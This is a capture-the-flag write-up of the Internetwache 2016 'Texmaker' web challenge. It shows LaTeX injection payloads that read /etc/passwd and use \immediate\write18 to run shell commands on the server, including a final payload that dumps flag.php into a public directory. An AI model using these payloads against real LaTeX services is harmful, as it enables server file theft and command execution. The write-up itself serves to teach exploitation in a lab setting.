Internetwache CTF 2016 — Web90 — Texmaker
This problem was my favorite of those I tried. When first navigating to the challenge site you are presented with an input field which generates LaTex, which is then used to generate a PDF.
This paper discusses methods for exploiting LaTex, including some sample code which could be used for reading files from the server.
\openin5=/etc/passwd
\def\readfile{%
\read5 to \curline
\ifeof5 \let\next=\relax
\else \curline~\\
\let\next=\readfile
\fi
\next} %
\ifeof5 Couldn’t Read the File! %
\else \readfile \closein5
\fi
After generating and checking the PDF I got the following:
The next step was learning how I could execute commands to look around the file system. I came across the \immediate\write18 combo of commands in this post, which will allow you to run commands on the server. The following line outputs the ls command to a temporary file.
\immediate\write18(ls /tmp/ > /tmp/tmpfile)
Looking into the /var/www/texmaker.ctf.internetwache.org/ directory, I found what I suspected was my flag file (flag.php).
After trying a number of other ways of accessing the file (cat, grep, sed, head, tail, etc) I tried to run php -s which returns the source of the input php file.
I put together the following final payload and browsed to /pdf/derp.txt (as it was publicly accessible), revealing the flag!
\immediate\write18{php -s ../flag.php > ../pdf/derp.txt}
IW{L4T3x_IS_Tur1ng_c0mpl3te}